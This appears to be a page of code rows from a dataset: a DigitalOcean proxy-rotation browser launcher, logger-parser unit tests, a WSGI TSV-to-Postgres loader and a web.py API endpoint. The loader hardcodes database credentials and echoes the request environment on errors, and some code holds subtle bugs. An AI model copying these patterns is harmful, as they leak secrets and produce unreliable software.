api_string = "https://api.digitalocean.com/droplets/?client_id={0}&api_key={1}".format(client_id, api_key)
check = urllib2.urlopen(api_string)
response = json.load(check)
print "Group ID for this machine: " + group
for droplet in response['droplets']:
print droplet['name'] + ": " + droplet['ip_address'] + " " + droplet['status']
# For this next step, the private key with correct permissions must be in home dir
# And host checking should be turned off in ssh config
# And the image should auto-start port forwarding on 1080
print "Now opening windows!"
instance = 1
url = "http://whatsmyip.us"
window = "-n"
directory = "--user-data-dir=/your/path/to/chrome/cacher"
executable = "/your/path/to/chrome"
for droplet in response['droplets']:
if group in droplet['name']:
server = "--proxy-server=socks://" + droplet['ip_address']
subprocess.Popen([executable, url, window, directory + str(instance), server])
time.sleep(5)
instance += 1
|
21,597 | f4786a6721ae18a65695ead4befa326c756fd490 | import os
import json
import unittest
from unittest import mock
from unittest.mock import ANY
import logging
from logging import handlers, LogRecord
from typing import Tuple, Optional, Dict
from tests.util.config_mixin import ConfigMixin
from backee.model.web_handler import WebHandler
from backee.model.max_level_filter import MaxLevelFilter
from backee.parser.config_parser import parse_config
class LoggersParserTestCase(ConfigMixin, unittest.TestCase):
"""
Tests for `backee/parser/logger_parser.py`.
"""
@unittest.mock.patch("os.mkdir")
def test_file_logger_all_values_parsed(self, mkdir):
"""
All possible values for file logger are set and parsed correctly.
"""
expected_file_logger = self.__create_file_logger(
filename="/folder/log_file1",
format="('%(asctime)s [%(threadName)18s][%(levelname)8s] %(message)s')",
max_bytes=1024,
backup_count=1,
min_level=logging.INFO,
max_level=logging.ERROR,
)
# parse config and get first logger
parsed_config = self._get_parsed_config("file_loggers_config.yml")
parsed_file_logger = parsed_config.loggers[0]
# make sure file was opened
mkdir.assert_called_with("/folder")
result, msg = self.__compare_file_loggers(
expected_file_logger, parsed_file_logger
)
self.assertTrue(
result,
msg=f"Full config is not as expected, following comparison failed: {msg}",
)
@unittest.mock.patch("os.mkdir")
def test_file_logger_default_values(self, mkdir):
"""
Only required values are set and others are default.
"""
expected_file_logger = self.__create_file_logger(
filename="/folder/log_file2",
format="('%(asctime)s %(levelname)s %(message)s')",
max_bytes=1 * 1024 * 1024,
backup_count=0,
min_level=logging.DEBUG,
max_level=logging.CRITICAL,
)
# parse config and get logger
parsed_config = self._get_parsed_config("file_loggers_config.yml")
parsed_file_logger = parsed_config.loggers[1]
# make sure file was opened
mkdir.assert_called_with("/folder")
result, msg = self.__compare_file_loggers(
expected_file_logger, parsed_file_logger
)
self.assertTrue(
result,
msg=f"Default config is not as expected, following comparison failed: {msg}",
)
def test_web_logger_all_values_parsed(self):
"""
All possible values for web logger are set and parsed correctly.
"""
expected_web_logger = self.__create_web_handler(
method="POST",
url="https://some/url1",
headers={"Content-Type": "application/json", "TestHeader1": "Value1"},
body='{"message":"message 1"}',
auth={
"type": "basic",
"username": "admin",
"password": "${WEB_LOGGER_PASSWORD}",
},
min_level=logging.INFO,
max_level=logging.ERROR,
)
# parse config and get logger
parsed_config = self._get_parsed_config("full_config.yml")
parsed_web_logger = parsed_config.loggers[0]
self.assertEqual(
expected_web_logger,
parsed_web_logger,
msg="full web logger is parsed incorrectly",
)
def test_web_logger_default_values(self):
"""
Only required values are set and others are default.
"""
expected_web_logger = self.__create_web_handler(
method="POST", url="https://some/url2", body='{"message":"message 2"}'
)
# parse config and get logger
parsed_config = self._get_parsed_config("default_config.yml")
parsed_web_logger = parsed_config.loggers[0]
self.assertEqual(
expected_web_logger,
parsed_web_logger,
msg="default web logger is parsed incorrectly",
)
@unittest.mock.patch("requests.post")
def test_web_logger_wildcard_replacements_in_post(self, mock_post):
"""
Test that {{ message }} and {{ name }} are replaced in url, headers and body for POST.
"""
parsed_config = self._get_parsed_config("full_config.yml")
parsed_web_logger = parsed_config.loggers[1]
message = "test"
name = parsed_config.name
parsed_web_logger.emit(
LogRecord(
name=None,
level=logging.ERROR,
pathname=None,
lineno=None,
msg=message,
args=None,
exc_info=None,
)
)
# headers, data and URL are updated
data = json.dumps(json.loads(f'{{"message":"{message}","name":"{name}"}}'))
mock_post.assert_called_once_with(
auth=ANY,
data=data,
headers={
"Content-Type": "application/json",
"TestHeader2": f"{name} {message}",
},
url=f"https://some/url2?name={name}&message={message}",
)
@unittest.mock.patch("requests.get")
def test_web_logger_wildcard_replacements_in_get(self, mock_get):
"""
Test that {{ message }} os replaced in url, headers and body for GET.
"""
parsed_config = self._get_parsed_config("full_config.yml")
parsed_web_logger = parsed_config.loggers[2]
message = "test"
name = parsed_config.name
parsed_web_logger.emit(
LogRecord(
name=None,
level=logging.ERROR,
pathname=None,
lineno=None,
msg=message,
args=None,
exc_info=None,
)
)
# headers, data and URL are updated
mock_get.assert_called_once_with(
auth=ANY,
headers={
"Content-Type": "application/json",
"TestHeader3": f"{name} {message}",
},
url=f"https://some/url3?name={name}&message={message}",
)
@unittest.mock.patch("os.mkdir")
def test_file_sizes_parser(self, mkdir):
"""
Test file sizes parser.
"""
id_file_size = {
2: 1,
3: 1 * 1024,
4: 1 * 1024 * 1024,
5: 1 * 1024 * 1024 * 1024,
}
# parse config and get first logger
parsed_config = self._get_parsed_config("file_loggers_config.yml")
# make sure file was opened
mkdir.assert_called_with("/folder")
[
self.assertEqual(v, parsed_config.loggers[k].maxBytes)
for k, v in id_file_size.items()
]
def __compare_file_loggers(
self, first: handlers.RotatingFileHandler, second: handlers.RotatingFileHandler
) -> Tuple[bool, str]:
"""
Helper function to compare two handlers.RotatingFileHandler instances.
"""
if not isinstance(first, handlers.RotatingFileHandler) or not (
second,
handlers.RotatingFileHandler,
):
return False, "class instance"
if first.baseFilename != second.baseFilename:
return False, "filename"
if first.maxBytes != second.maxBytes:
return False, "maxBytes"
if first.backupCount != second.backupCount:
return False, "backupCount"
if first.formatter._fmt != second.formatter._fmt:
return False, "formatter"
if first.level != second.level:
return False, "level"
if len(first.filters) != len(second.filters):
return False, "filters"
for x, y in zip(first.filters, second.filters):
if x != y:
return False, "filters items"
return True, None
def __create_file_logger(
self,
filename: str,
format: str,
max_bytes: int = 1048576,
backup_count: int = 0,
min_level: int = logging.DEBUG,
max_level: int = logging.CRITICAL,
) -> handlers.RotatingFileHandler:
with mock.patch("builtins.open", create=True):
handler = handlers.RotatingFileHandler(
filename=filename, maxBytes=max_bytes, backupCount=backup_count
)
handler.setFormatter(logging.Formatter(fmt=format))
handler.setLevel(min_level)
handler.addFilter(MaxLevelFilter(max_level))
return handler
def __create_web_handler(
self,
method: str,
url: str,
headers: Optional[Dict[str, str]] = None,
body: Optional[str] = None,
auth: Optional[Dict[str, str]] = None,
min_level: int = logging.DEBUG,
max_level: int = logging.CRITICAL,
) -> WebHandler:
web = WebHandler(method, url, headers, body, auth)
web.setLevel(min_level)
web.addFilter(MaxLevelFilter(max_level))
return web
if __name__ == "__main__":
unittest.main()
|
21,598 | 80e54a094fbd093a323dbc6dc9b0f18c84ffd813 | #!/usr/bin/env python3
# gunicorn3 -t 120 -b 127.0.0.1:8000 --reload myapp:app
# curl -v --data-binary "@data.txt" http://127.0.0.1:80/sess_start_tsv
# 1.119.142.196 SRR1972739 linux64 sra-toolkit fastq-dump.2.8.2 sra-download.ncbi.nlm.nih.gov 200 1539891273.321 1538981273.432 0 2\n
import sys
import ipaddress
import traceback
from io import BytesIO
import datetime
import psycopg2
def app(environ, start_response):
output = BytesIO()
try:
if environ["PATH_INFO"] == "/sess_start_tsv":
sess_start_tsv(environ, "add_session", start_response, output)
return [output.getvalue()]
elif environ["PATH_INFO"] == "/storage_tsv":
storage_tsv(environ, start_response, output)
return [output.getvalue()]
except:
headers = [("content-type", "text/plain")]
start_response("500 oops", headers, sys.exc_info())
print(sys.exc_info(), file=sys.stderr)
print(traceback.print_tb(sys.exc_info()[2]))
return [b"exception"]
def storage_tsv(environ, start_response, output):
headers = []
headers.append(("Content-Type", "text/plain"))
if environ["REQUEST_METHOD"].upper() != "POST":
output.write(b"Only POST supported\n")
dump_headers(environ, start_response, output)
return
start_response("200 OK", headers)
output.write(b"\nOutput\n------\n")
request_len = int(environ.get("CONTENT_LENGTH", 0))
output.write(b"Got %d input bytes\n" % request_len)
wsgi_input = environ["wsgi.input"]
count = 0
try:
db = psycopg2.connect(
"dbname='grafana' user='grafana' host='localhost' password='grafana'"
)
curs = db.cursor()
except Exception as e:
print("can't connect to the database: " + str(e))
r = wsgi_input.read()
lines = r.split(b"\n")
output.write(b"Got %d lines\n" % len(lines))
for line in lines:
if line is None:
print("Done", file=sys.stderr)
break
cols = line.split(b"\t")
if len(cols) < 4:
output.write(b"Short line:" + line)
continue
count += 1
try:
start = cols[0]
start = datetime.datetime.utcfromtimestamp(float(start))
bytecount = int(cols[1])
bucket = cols[2].decode()
source = cols[3].decode()
except Exception as e:
print("can't convert row:" + str(e) + ":" + repr(cols))
try:
curs.execute(
"select add_storage ( "
+ """
%s::text,
%s::timestamp,
%s::bigint,
%s::text)""",
(bucket, start, bytecount, source),
)
except Exception as e:
db.rollback()
print("can't insert storage:" + str(e))
db.commit()
output.write(b"called stored procedure %d times\n" % count)
print(f"called stored procedure {count} times\n")
# curs.execute('ANALYZE')
# curs.execute("CLUSTER")
return
def sess_start_tsv(environ, proc, start_response, output):
headers = []
headers.append(("Content-Type", "text/plain"))
if environ["REQUEST_METHOD"].upper() != "POST":
output.write(b"Only POST supported\n")
dump_headers(environ, start_response, output)
return
start_response("200 OK", headers)
output.write(b"\nOutput\n------\n")
request_len = int(environ.get("CONTENT_LENGTH", 0))
output.write(b"Got %d input bytes\n" % request_len)
wsgi_input = environ["wsgi.input"]
# foo=input.read()
# print("Got " + repr(foo), file=sys.stderr)
# print("Got " + str(len(lines)),file=sys.stderr)
# print("lines" + repr(lines),file=sys.stderr)
count = 0
try:
db = psycopg2.connect(
"dbname='grafana' user='grafana' host='localhost' password='grafana'"
)
curs = db.cursor()
except Exception as e:
print("can't connect to the database: " + str(e))
# lines=input.readlines()
# output.write(b'\n'.join(lines))
r = wsgi_input.read()
lines = r.split(b"\n")
output.write(b"Got %d lines\n" % len(lines))
for line in lines:
if line is None:
print("Done", file=sys.stderr)
break
# print("line is " + repr(line), file=sys.stderr)
cols = line.split(b"\t")
if len(cols) < 9:
output.write(b"Short line:" + line)
continue
# output.write(b'\n#%d Cols are:' % count)
# output.write(b'%d cols ' % len(cols))
# output.write(b','.join(cols))
count += 1
if len(cols) == 9:
source = "sra prod"
else:
source = cols[9].decode()
try:
ip = cols[0].decode()
acc = cols[1].decode()
agent = cols[2].decode()
res = int(cols[3])
domain = cols[4].decode()
start = cols[5]
start = datetime.datetime.utcfromtimestamp(float(start))
end = cols[6]
end = datetime.datetime.utcfromtimestamp(float(end))
bytecount = int(cols[7])
cnt = int(cols[8])
except Exception as e:
print("can't convert row:" + str(e) + ":" + repr(cols))
if ":" in ip:
ipint = int(ipaddress.IPv6Address(ip))
else:
ipint = int(ipaddress.IPv4Address(ip))
# with db.cursor() as curs:
try:
# Don't care if a few records are lost during server crash, DB will
# not be corrupted.
curs.execute("SET synchronous_commit = off")
curs.execute(
"select %s ( " % proc
+ """
%s::text,
%s::decimal(39,0),
%s::text,
%s::text,
%s::text,
%s::integer,
%s::timestamp,
%s::timestamp,
%s::bigint,
%s::integer,
%s::text)""",
(
ip,
ipint,
acc,
agent,
domain,
res,
start,
end,
bytecount,
cnt,
source,
),
)
except Exception as e:
db.rollback()
print("can't insert %s %s %s" % (proc, start, str(e)))
print("bad line was " + repr(line))
db.commit()
output.write(b"called stored procedure %d times\n" % count)
print("called stored procedure %d times\n" % count)
# curs.execute('ANALYZE')
# curs.execute("CLUSTER")
def dump_headers(environ, start_response, output):
headers = []
headers.append(("Content-Type", "text/plain"))
start_response("500 Bad", headers)
keys = environ.keys()
for key in keys:
x = "%s: %s\n" % (key, repr(environ[key]))
output.write(x.encode())
output.write(b"\n")
wsgi_input = environ["wsgi.input"]
lines = wsgi_input.readlines()
# inf=input.read()
output.write(b"Got %d lines\n" % len(lines))
output.write(b"\n".join(lines))
return
|
21,599 | 06a0cfce8bd3dcf579ab0f221debb142315d3a35 | #!/usr/bin/python
# -*- coding: utf8 -*-
"""
author:nango
update_time: 2015/7/23--12:05
apis:
/campus/batch/segment/list
"""
import route
import web
import random
import time
from database import *
from output import *
from encrypt import *
@route.route('/campus/batch/segment/list')
class CampusBatchSegmentListGet:
def POST(self):
input = web.input(accesstoken='')
# 参数不足
if input.access_token == '':
return output(118)
db = getDb()
results = db.select('campus_token', vars={'token': input.access_token},
where='access_token=$token', what="campus_id",order="campus_id desc")
if len(results) > 0:
try:
# 获取camupus id
campus_id = results[0].campus_id
# 查询batch_segment表,获取数据并排序
results = db.select('batch_segment', vars={'campus_id': campus_id},
where='campus_id=$campus_id',
order="begin_hour,begin_min,begin_second,end_hour,end_min,end_second asc")
data = []
for i in results:
data.append(GetTimeStr.getTimeStr(i.begin_hour, i.begin_min, i.end_hour, i.end_min))
# data = sorted(data)
data1 = []
indext = 1
for i in data:
data1.append({"batch_number": indext, "bacth_string": i})
indext = indext + 1
return output(200, data1)
except:
return output(700)
else:
# 权限不足,不允许删
return output(420)
class GetTimeStr:
@staticmethod
def getStr(number=0):
if number < 10:
number = "0" + str(number)
else:
number = str(number)
return number
@staticmethod
def getTimeStr(begin_hour=0, begin_min=0, end_hour=0, end_min=0):
begin_hour = GetTimeStr.getStr(begin_hour)
begin_min = GetTimeStr.getStr(begin_min)
end_hour = GetTimeStr.getStr(end_hour)
end_min = GetTimeStr.getStr(end_min)
print begin_hour + ":" + begin_min + "-" + end_hour + ":" + end_min
return begin_hour + ":" + begin_min + "-" + end_hour + ":" + end_min
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.